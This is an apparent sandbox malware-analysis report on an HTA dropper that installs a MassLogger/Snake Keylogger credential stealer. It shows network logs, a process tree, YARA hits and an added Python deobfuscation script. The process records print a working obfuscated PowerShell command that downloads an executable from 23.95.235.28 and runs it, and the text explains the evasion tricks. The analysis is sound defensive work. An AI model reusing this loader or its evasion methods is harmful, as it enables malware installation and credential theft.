Mar 13, 2025 01:19:05.381684065 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:05.435832024 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:05.590190887 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:05.636320114 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:05.986963034 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:05.987065077 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:05.987123013 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:05.994312048 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:20:08.139698982 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Mar 13, 2025 01:20:08.139776945 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:20:43.139899015 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:20:43.144731998 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 13, 2025 01:19:02.315434933 CET | 57433 | 53 | 192.168.2.6 | 1.1.1.1
Mar 13, 2025 01:19:02.323494911 CET | 53 | 57433 | 1.1.1.1 | 192.168.2.6
Mar 13, 2025 01:19:03.133621931 CET | 63664 | 53 | 192.168.2.6 | 1.1.1.1
Mar 13, 2025 01:19:03.144227028 CET | 53 | 63664 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 13, 2025 01:19:02.315434933 CET | 192.168.2.6 | 1.1.1.1 | 0x64bc | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.133621931 CET | 192.168.2.6 | 1.1.1.1 | 0x4b6b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 13, 2025 01:19:02.323494911 CET | 1.1.1.1 | 192.168.2.6 | 0x64bc | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 13, 2025 01:19:02.323494911 CET | 1.1.1.1 | 192.168.2.6 | 0x64bc | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:02.323494911 CET | 1.1.1.1 | 192.168.2.6 | 0x64bc | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:02.323494911 CET | 1.1.1.1 | 192.168.2.6 | 0x64bc | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:02.323494911 CET | 1.1.1.1 | 192.168.2.6 | 0x64bc | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:02.323494911 CET | 1.1.1.1 | 192.168.2.6 | 0x64bc | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 13, 2025 01:19:03.144227028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b6b | No error (0) | reallyfreegeoip.org |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
                                                                                    • reallyfreegeoip.org
                                                                                    • 23.95.235.28
                                                                                    • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49694 | 23.95.235.28 | 80 | 7452 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Mar 13, 2025 01:18:54.650934935 CET | 283 | OUT | GET /50/csso.exe HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 23.95.235.28
                                                                                    Connection: Keep-Alive
Mar 13, 2025 01:18:55.125833035 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:18:54 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Wed, 12 Mar 2025 09:14:06 GMT
                                                                                    ETag: "eae00-63021a093dc5f"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 962048
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-msdownload
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4f 50 d1 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 cc 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELOPg"}@ @@@@L|p%q+pH@.text `.rdata@@.datatR@.rsrc%p&@@.relocqr<@B


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49695 | 158.101.44.242 | 80 | 7656 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Mar 13, 2025 01:19:02.374370098 CET | 151 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
Mar 13, 2025 01:19:02.946003914 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:19:02 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: a11cda3146118a8da845a952c9dec197
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 13, 2025 01:19:02.952109098 CET | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
Mar 13, 2025 01:19:03.131881952 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:19:03 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: ba6bd08e7ce1c42e200f889d65170969
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49696 | 104.21.80.1 | 443 | 7656 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 00:19:05 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
2025-03-13 00:19:05 UTC | 865 | IN | HTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:19:05 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 235058
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Mon, 10 Mar 2025 07:01:26 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Ym9wIXjwljOzXCQ6nZENklDWAtPwlPtrFvKQqwC7p4wwEANiyn%2BmSnSnCIPI%2BWwYc9wv8i1o%2FnTIrCHbybRQpTAoivoQGH%2BmIDgYoC7fupUnaQ%2Bk%2Fm3o%2Fov8JebSahOsKGvikME"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91f75b990eccd668-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=14252&min_rtt=13887&rtt_var=4460&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=181385&cwnd=198&unsent_bytes=0&cid=4d080f104c641fdf&ts=1092&x=0"
2025-03-13 00:19:05 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Target ID:0
                                                                                    Start time:20:18:50
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:mshta.exe "C:\Users\user\Desktop\uhg.hta"
                                                                                    Imagebase:0xc20000
                                                                                    File size:13'312 bytes
                                                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:1
                                                                                    Start time:20:18:51
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                                                                                    Imagebase:0x2a0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:20:18:51
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff68dae0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:20:18:51
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'…'+[cHar]34+'))')))"
                                                                                    Imagebase:0x3b0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
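The command line recorded for Target ID 1 and repeated by the PowerShell process in Target ID 3 hides its decode-and-execute call in two ways: the `::` and the quote characters are assembled from [char] casts so that `::FromBase64String("` never appears literally, and the Base64 blob is padded with long runs of spaces and mixed-case cmdlet names so that a plain string match fails. It also begins with a throwaway call to DeviceCredentialDeployment.exe, a benign Windows binary, before the real work. The Python script below is an added analysis example and is not part of the Joe Sandbox report: it evaluates what the inner ieX produces, decodes the Base64 payload printed in the Target ID 1 record (embedded verbatim so the script runs offline; nothing is downloaded or executed), and pulls out the download URL, drop path, P/Invoke'd DLL and cmdlets. The regular expressions and the function names resolve_concat, decode_stage, extract_iocs and analyze are the example's own.

```python
import base64
import re

# Base64 payload exactly as printed in the Target ID 1 command line above.
B64 = "JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI="

# The obfuscated PowerShell command line from the report (cmd.exe wrapper
# removed), rebuilt around that payload so the example runs offline.
# Nothing below executes it; we only emulate the string building.
CMDLINE = (
    "PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; "
    "Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+"
    "'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+"
    "'FroMBASE64sTrIng('+[CHaR]0X22+'" + B64 + "'+[cHar]34+'))')))"
)

# PowerShell is case-insensitive, so every keyword is matched with re.I.
# Single-quoted literals and [char]N casts (decimal or 0x hex) are the only
# pieces this sample concatenates; doubled '' escapes are not handled (assumption).
TOKEN = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=\s]+)"\)', re.I)


def resolve_concat(expr: str) -> str:
    """Evaluate a 'literal'+[char]N+'literal' concatenation. Here [char]0x3A+
    [char]58 yields '::' and [char]0x22 / [char]34 yield the double quotes."""
    parts = []
    for lit, num in TOKEN.findall(expr):
        if num:
            parts.append(chr(int(num, 16) if num.lower().startswith("0x") else int(num)))
        else:
            parts.append(lit)
    return "".join(parts)


def decode_stage(cmdline: str) -> str:
    """Unwrap one ieX(... FromBase64String(...)) layer and return the script
    text that the outer Iex would execute."""
    inner = resolve_concat(cmdline)
    m = B64_CALL.search(inner)
    if not m:
        raise ValueError("no FromBase64String() call found after de-obfuscation")
    blob = re.sub(r"[^A-Za-z0-9+/]", "", m.group(1))
    blob += "=" * (-len(blob) % 4)          # restore padding if the author stripped it
    return base64.b64decode(blob).decode("utf-8")


def extract_iocs(script: str) -> dict:
    """Pull network and host indicators out of the decoded stager. Whitespace
    is collapsed and names lower-cased first, since the padding and casing
    are the obfuscation, not the content."""
    s = re.sub(r"\s+", " ", script).strip()
    return {
        "script": s,
        "urls": re.findall(r"https?://[^\s\"']+", s),
        "drop_paths": sorted({p.lower() for p in re.findall(r'''\$env:[A-Za-z_]+\\[^\s"']+''', s, re.I)}),
        "pinvoke": re.findall(r'DllImport\("([^"]+)"', s),
        "cmdlets": sorted({c.lower() for c in re.findall(
            r"\b(add-type|start-sleep|invoke-item|invoke-expression|iex)\b", s, re.I)}),
    }


def analyze(cmdline: str) -> dict:
    return extract_iocs(decode_stage(cmdline))


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(CMDLINE), indent=2))
```

The decoded stager is a single Add-Type P/Invoke of urlmon!URLDownloadToFile that saves http://23.95.235.28/50/csso.exe to %APPDATA%\csso.exe, sleeps three seconds and starts it with Invoke-Item, which is the csso.exe process recorded as Target ID 6 below; the Add-Type call is also what spawns the csc.exe and cvtres.exe processes in Target IDs 4 and 5. If a decoded script still contains a FromBase64String call, run decode_stage on it again: loaders frequently nest several such layers.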

                                                                                    Target ID:4
                                                                                    Start time:20:18:53
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
                                                                                    Imagebase:0x30000
                                                                                    File size:2'141'552 bytes
                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:20:18:53
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"
                                                                                    Imagebase:0x420000
                                                                                    File size:46'832 bytes
                                                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:20:18:58
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Users\user\AppData\Roaming\csso.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\csso.exe"
                                                                                    Imagebase:0x20000
                                                                                    File size:962'048 bytes
                                                                                    MD5 hash:724A10F0D502447504BD44AD72AA462F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 71%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:20:18:59
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\csso.exe"
                                                                                    Imagebase:0x2b0000
                                                                                    File size:45'984 bytes
                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
